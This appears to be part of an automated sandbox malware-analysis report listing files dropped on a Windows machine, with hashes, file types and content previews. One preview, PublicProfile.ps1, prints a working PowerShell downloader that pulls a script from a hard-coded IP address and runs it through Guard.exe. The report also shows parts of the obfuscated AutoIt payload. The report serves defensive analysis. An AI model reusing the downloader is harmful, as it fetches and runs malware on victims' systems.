                                                                                        Entropy (8bit):0.7067211677773397
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqh:2JIB/wUKUKQncEmYRTwh0d
                                                                                        MD5:DAB844C9ADAB2210C28C3FB36D0B0E48
                                                                                        SHA1:D0231C8C0A16C4E832462BF91E76C31A048968B2
                                                                                        SHA-256:BD06D426500D91AC0FE63D17F7344617B9A5F1F386BE6B93B5DB9BE8AA3CE3CD
                                                                                        SHA-512:4DF2FD98F77F5BAC1809C9C5ABBFC75C491758B7D05D006A714CDCD0ACA2CC7318EFCEAE5342E4E8E1B7440941342D244CEB25E91EFFAC3F845C95BD8B510E86
                                                                                        Malicious:false
                                                                                        Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x82bae8ed, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.7900082947152514
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:jSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:jazaPvgurTd42UgSii
                                                                                        MD5:FA3B37A0BDB386B13C36A9E8F328D0C6
                                                                                        SHA1:8BF7CC992349F341476977D80E5AFA6922711127
                                                                                        SHA-256:B74228DCA588F0A354969EE685FFA981B009CD83B7B78B715F7A74FDBE9EEC32
                                                                                        SHA-512:260765213C5FA22E20A8DA9A8BE021032882012A0AA316BD21CD6AEBB8F2D064C8C75044C87C4C97C2F0877D72D72F6A521C44582C23CFC04357B3B845DCB354
                                                                                        Malicious:false
                                                                                        Preview:....... ...............X\...;...{......................0.`.....42...{5..7...|C.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................`'..7...|C..................Brl.7...|C..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.08303339105154028
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YSYeLkrpvNt/57Dek3J7VrXAllEqW3l/TjzzQ/t:YSzLUvPR3t1Amd8/
                                                                                        MD5:7C336E3AD26945C0A1F1003A2A0B7BA0
                                                                                        SHA1:4B143A77C2A27FA9DD618FAD088217D9BC78A0BE
                                                                                        SHA-256:C97302458A1F74AEA09ADC35EE37BE46DB7DE402E4F2BEE338B57A52343FBC73
                                                                                        SHA-512:F99DB27734EA6F93AC0FBA4F46CB1323EE5B8F72AFFD29535DE373DE1968011216020A3C3E76694CEAC9EBDBC06A38A901F410435D767012FDA9CD26993097D5
                                                                                        Malicious:false
                                                                                        Preview:.dM......................................;...{...7...|C.42...{5.........42...{5.42...{5...Y.42...{59.................Brl.7...|C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\Public\Guard.exe

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):893608
                                                                                        Entropy (8bit):6.62028134425878
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                        • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                                        • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                                        • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                                                        • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                                                        • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                                                        • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\Public\PublicProfile.ps1

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Roaming\BFmcYQ.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):484
                                                                                        Entropy (8bit):5.252282020229904
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:f73/oL0FEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/m0CknZ9LzjYnRSb8Cba
                                                                                        MD5:F7641825D3071321407C6DE7A3B0DC6E
                                                                                        SHA1:69C8C8AB335618377ECCF232984E7EB9697D62BB
                                                                                        SHA-256:02A53A33EA74A9B1185C4DA503115C45E6F704B729F34F124FF3C49692DF7B86
                                                                                        SHA-512:471900CCE7B52955D3D430E8D096B9E0FC38ED2CABFE1D16E6E7EF8208754E608935B6C951442F11D21B008C8C08BC80EAA33FFE0A52A27E7B11BC89BD368407
                                                                                        Malicious:true
                                                                                        Preview:[string]$fU5L = "http://139.99.188.124/EsgMle.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L

                                                                                        C:\Users\Public\Secure.au3

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                                        Category:dropped
                                                                                        Size (bytes):1244519
                                                                                        Entropy (8bit):5.142156508968495
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:28V+jcfSRkDQ5a1LYyQyFiI+SE71+KhpL0Wf+EpAlOQd:qcd7cfr5sWLHfvA
                                                                                        MD5:7094A5145C288E70D10E5AF0C49E2497
                                                                                        SHA1:CC12AC32757A8091281644DE8527F46E6E0945A8
                                                                                        SHA-256:D19010F3AD5B4E8A3EA748678F3C471E49C58F0AE3583B6698E30DE2D54E1AFD
                                                                                        SHA-512:D2B22BD157C7086C7533B4C6D154B11B9DEC7EC863DF71882D3BF23F543666F61091D6895B46DBAE1FFA30764AE4DF67B685F8D80C175F1E502FABBCBE9B1F5F
                                                                                        Malicious:true
                                                                                        Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):297
                                                                                        Entropy (8bit):5.267539148781079
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7P7pyq2PcNwi2nKuAl9OmbnIFUt8OPj3j1Zmw+OPWZRkwOcNwi2nKuAl9OmbjLJ:7lyvLZHAahFUt8ObZ/+OkR54ZHAaSJ
                                                                                        MD5:B2730C0DC373D0103FA4D5F87CDB8032
                                                                                        SHA1:CD293E43A43CA759CDC36FF009D4E47C55ECC3FF
                                                                                        SHA-256:A6B67FBFE28F4C2AA16408D5636E04E10E3833CB42711F7B10B022BB66F73625
                                                                                        SHA-512:EBA3170F910651FEE28C3F806D80A7B6661CC755B2C16209E50D51389EE48DBFD1A0C5A9CB21C59CA081542922CA07632CBC6634F20CAB1F00E276E075113FBA
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:35.572 cc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-14:55:35.598 cc4 Recovering log #3.2024/12/18-14:55:35.599 cc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):297
                                                                                        Entropy (8bit):5.267539148781079
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7P7pyq2PcNwi2nKuAl9OmbnIFUt8OPj3j1Zmw+OPWZRkwOcNwi2nKuAl9OmbjLJ:7lyvLZHAahFUt8ObZ/+OkR54ZHAaSJ
                                                                                        MD5:B2730C0DC373D0103FA4D5F87CDB8032
                                                                                        SHA1:CD293E43A43CA759CDC36FF009D4E47C55ECC3FF
                                                                                        SHA-256:A6B67FBFE28F4C2AA16408D5636E04E10E3833CB42711F7B10B022BB66F73625
                                                                                        SHA-512:EBA3170F910651FEE28C3F806D80A7B6661CC755B2C16209E50D51389EE48DBFD1A0C5A9CB21C59CA081542922CA07632CBC6634F20CAB1F00E276E075113FBA
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:35.572 cc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-14:55:35.598 cc4 Recovering log #3.2024/12/18-14:55:35.599 cc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):341
                                                                                        Entropy (8bit):5.2926280310398
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7PBxL4q2PcNwi2nKuAl9Ombzo2jMGIFUt8OPqTZZmw+OPP1kwOcNwi2nKuAl9OmT:7JxL4vLZHAa8uFUt8Oe/+OV54ZHAa8RJ
                                                                                        MD5:BA55094258142BE3B4F296DDE3F0A48D
                                                                                        SHA1:E89E5708036C089D168379CEA3593934B4D0A68B
                                                                                        SHA-256:2231F48D3FBCE0BA7BE67FDEE21BC92FCC644DBDAF74E2B64078B8A229827AF5
                                                                                        SHA-512:3DD73F6ED54290D591B0316CC27D109AD6AE028D080E20168A4999C14CEA622962BF62249906F66309DBB426C492929E6F939B020A79A2C239B188B3664F8D3B
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:35.677 9c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-14:55:35.678 9c4 Recovering log #3.2024/12/18-14:55:35.679 9c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):341
                                                                                        Entropy (8bit):5.2926280310398
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7PBxL4q2PcNwi2nKuAl9Ombzo2jMGIFUt8OPqTZZmw+OPP1kwOcNwi2nKuAl9OmT:7JxL4vLZHAa8uFUt8Oe/+OV54ZHAa8RJ
                                                                                        MD5:BA55094258142BE3B4F296DDE3F0A48D
                                                                                        SHA1:E89E5708036C089D168379CEA3593934B4D0A68B
                                                                                        SHA-256:2231F48D3FBCE0BA7BE67FDEE21BC92FCC644DBDAF74E2B64078B8A229827AF5
                                                                                        SHA-512:3DD73F6ED54290D591B0316CC27D109AD6AE028D080E20168A4999C14CEA622962BF62249906F66309DBB426C492929E6F939B020A79A2C239B188B3664F8D3B
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:35.677 9c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-14:55:35.678 9c4 Recovering log #3.2024/12/18-14:55:35.679 9c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.95774050953709
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq+sBdOg2HDqAAcaq3QYiubSpDyP7E4TX:Y2sRdsOdMHDqAr3QYhbSpDa7n7
                                                                                        MD5:31EA116B6245FB4037A724C6DBC82ABF
                                                                                        SHA1:C59CDB10CAB33B573A49979C61CA7D722959049A
                                                                                        SHA-256:18F20DCAB69BF421DAA7A25A69BF8CB238CA54F800094AC31E81C02A3BD828F3
                                                                                        SHA-512:17A52126651DBD2DE17416D2B7369FAE5E6C0B65190B3A5A8B89BC4BDA29672D4438923C8282526AED841E84CDAAAE7465E00E01E651C766DE6B40AC4911FC57
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379111749110363","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":591315},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a82e9fa2-6681-477f-a3f6-261ad03d76eb.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.95774050953709
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq+sBdOg2HDqAAcaq3QYiubSpDyP7E4TX:Y2sRdsOdMHDqAr3QYhbSpDa7n7
                                                                                        MD5:31EA116B6245FB4037A724C6DBC82ABF
                                                                                        SHA1:C59CDB10CAB33B573A49979C61CA7D722959049A
                                                                                        SHA-256:18F20DCAB69BF421DAA7A25A69BF8CB238CA54F800094AC31E81C02A3BD828F3
                                                                                        SHA-512:17A52126651DBD2DE17416D2B7369FAE5E6C0B65190B3A5A8B89BC4BDA29672D4438923C8282526AED841E84CDAAAE7465E00E01E651C766DE6B40AC4911FC57
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379111749110363","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":591315},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4099
                                                                                        Entropy (8bit):5.233033088153869
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPSpkHcC:CwNw1GHqPySfkcigoO3h28ytPSp8cC
                                                                                        MD5:D9F9DF4A594B42F6C092A07DC8D94FE3
                                                                                        SHA1:B17D75399A214DFCEFC664AFFA65C227ADDA5886
                                                                                        SHA-256:C0AACF957DE24888B44C9C498481EAEC89A7107FF11733302E379ABFA05A3635
                                                                                        SHA-512:BA19CC1D4F61C55D17A6D5B55CB95B988AAAE7ED27E77002827526F01EB735530C04B3BC43DD445CDEBBACADEF73E13DC2B71599D3EDF7EFF849D68B8BFB14DC
                                                                                        Malicious:false
                                                                                        Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):329
                                                                                        Entropy (8bit):5.263299823498246
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7Pifq2PcNwi2nKuAl9OmbzNMxIFUt8OPiUtZmw+OPi7PkwOcNwi2nKuAl9OmbzNq:76fvLZHAa8jFUt8O6Ut/+O6754ZHAa8E
                                                                                        MD5:ED4622ED16E498547543162F9332BBC8
                                                                                        SHA1:0F1079AE4E2B4349D5B76EC0DD114BCF8145D6E1
                                                                                        SHA-256:4F407888D1CD23D73CD0F63A9FC76E703211184BD4FEE0CD05A95C864D8AF797
                                                                                        SHA-512:485D5E56E1C7BC266BBBEF47202041039DFB87FA5C14CD219489355239B2D9E9F49915A6D7487B60EF0F8E1CB758966DCB09E2415913EBCF5F36BBCACBFE533E
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:36.106 9c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-14:55:36.126 9c4 Recovering log #3.2024/12/18-14:55:36.134 9c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):329
                                                                                        Entropy (8bit):5.263299823498246
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7Pifq2PcNwi2nKuAl9OmbzNMxIFUt8OPiUtZmw+OPi7PkwOcNwi2nKuAl9OmbzNq:76fvLZHAa8jFUt8O6Ut/+O6754ZHAa8E
                                                                                        MD5:ED4622ED16E498547543162F9332BBC8
                                                                                        SHA1:0F1079AE4E2B4349D5B76EC0DD114BCF8145D6E1
                                                                                        SHA-256:4F407888D1CD23D73CD0F63A9FC76E703211184BD4FEE0CD05A95C864D8AF797
                                                                                        SHA-512:485D5E56E1C7BC266BBBEF47202041039DFB87FA5C14CD219489355239B2D9E9F49915A6D7487B60EF0F8E1CB758966DCB09E2415913EBCF5F36BBCACBFE533E
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:36.106 9c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-14:55:36.126 9c4 Recovering log #3.2024/12/18-14:55:36.134 9c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241218195540Z-172.bmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                        Category:dropped
                                                                                        Size (bytes):65110
                                                                                        Entropy (8bit):1.1217569600910675
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:IMMNvEzMMT9M7ziVkMM1MMMMMMMMxMMM2MMM9MAMMBvMMneMMMzMMMMzMMMOfMQn:TOY
                                                                                        MD5:4B9C650BD0BCA8ECB718BF230E45A493
                                                                                        SHA1:8B7C0D60AC3B7CEB8E21C81736F9153A3B835ED7
                                                                                        SHA-256:88A9087C40E02862B1FBB69BB995341B2F1DDBF91C527BC3552012400FFC16E3
                                                                                        SHA-512:FF4892383ABE6645FB6983143B549C9548121B2C206DEFF54AE92C49EF9BC90AA6EFCD33B1F8EBBCFE171888B15E0C5A1F9A2677DE7F7743A0B4695059793998
                                                                                        Malicious:false
                                                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                        Category:dropped
                                                                                        Size (bytes):86016
                                                                                        Entropy (8bit):4.439313673369037
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:yeaci5GIiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1kurVgazUpUTTGt
                                                                                        MD5:320EC049F194FFF73CF9C6E5D1BCD762
                                                                                        SHA1:E46C497334B1945EA908A5E086ABAFF746732C1F
                                                                                        SHA-256:54BB4DFE5AFE8D25F3C0B3718E8A9CA473F7CC5243484F4AC9C8DB9382C53E46
                                                                                        SHA-512:699D03559C4A6E09348B7B134827809448F07101F9295BCA4EDC0060699B9A5C1EBBB35E2D51D0626D3508C37B2BB53C663250C1D0325F2F2DD18125B954D313
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):3.777566408037077
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7Mzp/E2ioyVrioy3DoWoy1CABoy1fKOioy1noy1AYoy1Wioy1hioybioy7oy1noq:7Mpjur0iAJXKQSyb9IVXEBodRBke
                                                                                        MD5:055280F7B783B3C7C05B196C5CA21660
                                                                                        SHA1:868CE9D662735671E053ABCF95516C47038FDF3B
                                                                                        SHA-256:21EFED7CB1E4AAF9BDDAB162DCF0DD07FC8FB4BF3F7A0B01960E596E105DD03B
                                                                                        SHA-512:E34EAD766450BE0AF3BF7F24E0C42A4E5BC82AAFDE15A9A57FD20BC9D40AA42132E89E67AED26B198448ADCF47D531C3BE9A1A6C788F04F11EA5550185086252
                                                                                        Malicious:false
                                                                                        Preview:.... .c.....)?.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Certificate, Version=3
                                                                                        Category:dropped
                                                                                        Size (bytes):1391
                                                                                        Entropy (8bit):7.705940075877404
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                        Malicious:false
